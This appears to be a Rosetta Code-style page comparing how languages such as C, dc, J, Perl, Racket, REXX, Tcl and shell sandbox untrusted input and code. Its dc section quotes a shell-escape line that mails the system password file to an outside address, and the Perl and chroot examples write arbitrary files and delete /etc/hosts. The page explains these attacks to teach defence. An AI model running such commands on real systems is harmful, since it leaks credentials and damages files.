Sometimes it is useful to run code with inputs from untrusted users, untrusted code, etc. Explain and demonstrate the features your language uses for dealing with untrusted input and untrusted code. Explain possible compromises, weaknesses and exploits that may be available through the language (for example forcing execution of something outside of the application) as a result of using untrusted data sources.
The intention is that the definition is to be interpreted broadly; different languages will solve this task in very different ways and with (generally) incomparable results.
C is a double-edged sword. It was designed to allow programmers to do virtually anything and everything. The ability to access memory at the bit level and embed assembly directly, while remaining readable (or unreadable) by humans, resulted in a language which forms the foundation of the world as we know it.
In other words, there is no check. Users and programmers can do anything they want. There is no sandbox, no off-limits area. Unless it is explicitly forbidden by the compiler or the operating system, a C program without sufficient and necessary checks will result in 'unintended and unforeseen' consequences with the 'appropriate' inputs.
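As a minimal sketch of what "sufficient and necessary checks" can look like, the two helpers below refuse untrusted text that does not fit a fixed-size buffer and untrusted numbers that are malformed or out of range. The names copy_untrusted and parse_untrusted_long are hypothetical, chosen only for this illustration; they are not part of any standard library.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: copy untrusted text into a fixed-size buffer.
 * Returns 0 on success, -1 if the text (plus its terminator) does not fit.
 * Nothing is written on failure, so there is no silent truncation. */
int copy_untrusted(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size)            /* need room for the trailing '\0' */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hypothetical helper: parse an untrusted decimal string into [min, max].
 * Returns 0 on success, -1 on empty input, trailing junk, overflow,
 * or a value outside the allowed range. */
int parse_untrusted_long(const char *text, long min, long max, long *out)
{
    char *end;
    long value;

    if (text == NULL || out == NULL)
        return -1;
    errno = 0;
    value = strtol(text, &end, 10);
    if (end == text || *end != '\0')    /* no digits, or junk after them */
        return -1;
    if (errno == ERANGE || value < min || value > max)
        return -1;
    *out = value;
    return 0;
}
```

A caller would check the return value before touching the destination, for example rejecting a request outright when copy_untrusted returns -1 rather than working with a partial copy.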
On the bright side, programming in C disciplines the programmer: there is nothing like a grueling boot camp or wartime conscription to make one appreciate the niceties of Java, Perl, Python or Haskell.
But try writing an operating system with them...
With great power comes great responsibility. :)
Beware of allowing user input to be fed to the reverse polish calculator. It has the ability to run shell commands, and this could be a security risk:
`!'cat /etc/password|mail [email protected]
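One way a host program might screen text before handing it to dc is sketched below in C. The function name dc_input_looks_safe is hypothetical. It assumes that ! is the only route to the shell, and it lets through only the negated comparisons !<, != and !>, which dc parses in preference to a shell escape. A deny-list like this is fragile by nature, so treat it as an illustration rather than a complete defence; running dc under an unprivileged account is sturdier.

```c
#include <stddef.h>

/* Hypothetical pre-filter for text that will be passed to dc.
 * Returns 1 if no shell escape is found, 0 otherwise.
 * Every '!' is rejected unless it begins one of dc's negated
 * comparisons (!<, !=, !>). Text inside [ ] is checked as well,
 * because a string can later be executed as a macro. */
int dc_input_looks_safe(const char *text)
{
    size_t i;

    if (text == NULL)
        return 0;
    for (i = 0; text[i] != '\0'; i++) {
        if (text[i] == '!') {
            char next = text[i + 1];   /* at worst the terminating '\0' */
            if (next != '<' && next != '=' && next != '>')
                return 0;
        }
    }
    return 1;
}
```

Input that fails the check should be discarded whole, not "repaired", since partial stripping tends to open new holes.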
J has some security mechanisms built in, and they are detailed below. But to understand their scope (and limitations), it's probably helpful to provide some context first.
J is a function-level language, expressed with composition of primitive words, like + for plus and ! for factorial and @ for function-composition and / for reduce, etc.
Because J is also (mostly) functional, almost all of these primitive words are also "native": that is, they stay within the bounds of the execution environment, and cannot reach outside of it to the host system. They cannot even affect J's own memory space, except through assigning variables.
In fact, there is only one word which can reach outside the execution environment (the functional scope of the program): !:, the aptly named "foreign" operator. This one operator encapsulates all access to the outside world, and even the "behind the scenes world" of J's own memory space.
The operator takes two arguments and derives a function, which specifies which kind of foreign interface you want. For example, 1!:1 is the specific function to read a file, and 1!:2 is the function to write one (as in 1!:1 'filename' and some_data 1!:2 'filename', respectively). The foreign function 15!:0 allows the J programmer to call a shared library (dll, so, dylib, etc), 2!:5 reads environment variables (e.g. 2!:5'PATH'), and 2!:55 will terminate the program (quit, die: the mnemonic is that 255 is the "last" value of a byte, and 2!:55 is the "last" thing you want to do in a J program). There are many more, grouped into families (the first argument to !: specifies which family you want, e.g. 1!:n is the file family, and 1!:1 is specifically the file read function).
But the key thing is that this one operator, !:, controls all the dangerous stuff, so if we want to prevent dangerous stuff, we only have to put guards in one place. And, in fact, we have "foreign controls": foreign functions which themselves control which foreign functions are allowed. In other words, there's only one "door" to J, and we can lock it.
From the J documentation:
- 9!:25 y Security Level: The security level is either 0 or 1. It is initially 0, and may be set to 1 (and can not be reset to 0). When the security level is 1, executing Window driver commands and certain foreigns (!:) that can alter the external state cause a “security violation” error to be signalled. The following foreigns are prohibited: dyads 0!:n , 1!:n except 1!:40 , 1!:41, and 1!:42 , 2!:n , and 16!:n .
There are further foreign controls on how much space, or time, a single execution is allowed to take:
- 9!:33 y Execution Time Limit: The execution time limit is a single non-negative (possibly non-integral) number of seconds. The limit is reduced for every line of immediate execution that exceeds a minimum granularity, and execution is interrupted with a “time limit error” if a non-zero limit is set and goes to 0.
- 9!:21 y Memory Limit: An upper bound on the size of any one memory allocation. The memory limit is initially 2^30 on 32-bit systems and 2^62 on 64-bit systems.
With all that said, the language has seen limited use in contexts where code injection is a concern, so these mechanisms are rarely exercised (and somewhat dated).
GP has a default, secure, which disallows the system and extern commands. Once activated, this default cannot be removed without input from the user (i.e., not by a script).
default(secure,0); \\ Ineffective without user input
Perl can be invoked in taint mode with the command-line option -T. In this mode, input from the user, and every variable derived from it, cannot be used in certain contexts (such as opening a file for writing or running a command) until it has been 'sanitized' by extracting the wanted part with a regular expression match.
my $f = $ARGV[0];
open FILE, ">$f" or die 'Cannot open file for writing';
print FILE "Modifying an arbitrary file\n";
The racket/sandbox library provides a way to construct limited evaluators, which are prevented from using too much time or memory, from reading, writing or executing files, from using the network, etc.
(require racket/sandbox)
(define e (make-evaluator 'racket))
(e '(...unsafe code...))
The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be configured in many ways to lift some of these restrictions where a particular use case calls for it.
Details for Regina REXX.
REXX is designed to assist in system scripting. Normally, any command that is not a REXX instruction or user-added command is passed to the operating system or the default ADDRESS environment for evaluation.
Regina includes a RESTRICTED mode. This disables
- LINEOUT, CHAROUT, POPEN, RXFUNCADD BIFs
- "OPEN WRITE", "OPEN BOTH" subcommands of STREAM BIF
- The "built-in" environments, e.g. SYSTEM, CMD or PATH, of the ADDRESS command
- Setting the value of a variable in the external environment with VALUE BIF.
- Calling external functions
This mode is started from the command line with the -r option. When embedding Regina for application scripting, the RexxStart API can have the RXRESTRICTED bit set in the CallType field.
By the way, BIF is short for Built In Function.
For example, given cat.rexx:
ADDRESS SYSTEM 'cat cat.rexx'
prompt$ regina cat.rexx
ADDRESS SYSTEM 'cat cat.rexx'
prompt$ regina -r cat.rexx
     1 +++ ADDRESS SYSTEM 'cat cat.rexx'
Error 95 running "/home/user/lang/rexx/cat.rexx", line 1: [Restricted feature used in "safe" mode]
Error 95.5: [Running external commands invalid in "safe" mode]
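Ruby handles untrusted input with the global variable $SAFE. Settings higher than 0 invoke an increasing level of sandboxing and general paranoia. This applies to older versions of Ruby; since Ruby 3.0, $SAFE is an ordinary global variable with no special effect.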
require 'cgi'
$SAFE = 4
cgi = CGI::new("html4")
Tcl allows evaluation of untrusted code through safe interpreters, which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, opening of sockets, description of the platform, etc.
set context [interp create -safe]
$context eval $untrustedCode
Because the only way that Tcl code can perform an operation is by invoking a command, if that command is not present in the execution context then the functionality is gone.
It is possible to provide restricted versions of operations to allow things like access to built-in packages.
set context [safe::interpCreate]
$context eval $untrustedCode
These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation.
Enclose variable references in double quotes
Variable references should be enclosed in double quotes. An unquoted reference to an empty variable expands to nothing, so the argument is omitted during evaluation and the command fails:
# num=`expr $num + 1` # This may error if num is an empty string
num=`expr "$num" + 1` # The quotes are an improvement
Do not allow users to run programs that can launch a new shell
Traditional Unix provides a restricted mode shell (rsh) that does not allow the following operations:
- changing directory
- specifying absolute pathnames or names containing a slash
- setting the PATH or SHELL variable
- redirection of output
However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that provides a shell escape. For example, in vi the command :set shell=/bin/sh followed by :shell starts an ordinary, unrestricted shell.
Use a chroot jail
Sometimes chroot jails are used to add a layer of security, so that paths seen by the confined process resolve inside the jail directory:
setuid(9); # if 9 is the userid of a non-root user
rm /etc/hosts # actually points to ~/jail/etc/hosts
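The setuid(9) step above is really a C library call, so the same sequence can be sketched from C. The helper name enter_jail is hypothetical, and the sketch assumes a POSIX-like system where the caller starts as root (chroot fails otherwise). It enters the jail first and only then gives up privileges, dropping groups and the group id before the user id, because after setuid succeeds the process can no longer change them.

```c
#define _DEFAULT_SOURCE   /* exposes chroot() and setgroups() on glibc */
#include <grp.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: confine the calling process to jail_dir and then
 * drop root. Returns 0 on success, -1 at the first step that fails. */
int enter_jail(const char *jail_dir, uid_t uid, gid_t gid)
{
    if (jail_dir == NULL)
        return -1;
    if (chdir(jail_dir) != 0)        /* step inside the jail directory */
        return -1;
    if (chroot(".") != 0)            /* needs root; "/" is now the jail */
        return -1;
    if (chdir("/") != 0)             /* make sure the cwd is inside it */
        return -1;
    if (setgroups(0, NULL) != 0)     /* drop supplementary groups */
        return -1;
    if (setgid(gid) != 0)            /* group first, while still root */
        return -1;
    if (setuid(uid) != 0)            /* finally give up root */
        return -1;
    return 0;
}
```

After a successful enter_jail(dir, 9, 9), a call such as unlink("/etc/hosts") would resolve to the copy under the jail directory, matching the rm line above. A caller should treat any -1 as fatal and exit, since a partially applied jail leaves the process in an unclear state.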
Basically, there is no trusted mode. If the OS lets you do it, you can. This means internet access, file system examination/modification, forking processes, pulling in arbitrary source code, compiling and running it, etc.